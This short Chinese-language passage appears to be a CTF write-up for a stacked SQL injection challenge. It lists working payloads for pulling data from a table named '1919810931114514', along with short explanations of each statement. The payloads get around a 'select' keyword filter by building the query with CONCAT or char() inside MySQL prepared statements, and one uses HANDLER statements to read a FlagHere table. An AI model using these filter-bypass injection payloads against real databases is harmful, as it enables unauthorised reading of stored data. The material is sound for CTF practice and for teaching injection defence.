预编译:
1、已知目标数据所在的具体库名表名,现在只差提取出来
payload:
-1';set @sql = CONCAT('se','lect * from `1919810931114514`;');prepare stmt from @sql;EXECUTE stmt;
拆分开来如下 -1'; set @sql = CONCAT('se','lect * from `1919810931114514`;'); prepare stmt from @sql; EXECUTE stmt;
其中:
set用于设置变量名和值
prepare用于预备一个语句,并赋予名称,以后可以引用该语句
execute执行语句
deallocate prepare用来释放掉预处理的语句
2、
payload: 1';PREPARE jwt from concat(char(115,101,108,101,99,116), ' * from `1919810931114514` ');EXECUTE jwt;#
拆分开来如下: PREPARE jwt from '[my sql sequece]'; //预定义SQL语句 EXECUTE name; //执行预定义SQL语句 (DEALLOCATE || DROP) PREPARE name; //删除预定义SQL语句
其中:
HANDLER方法:PREPARE name from @sql; //预定义SQL语句 EXECUTE name; //执行预定义SQL语句 (DEALLOCATE || DROP) PREPARE sqla; //删除预定义SQL语句
payload 1';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;#
handler table_name open ... //获取句柄
handler ... read first //读取第一行数据
handler ... read next //读取下一行数据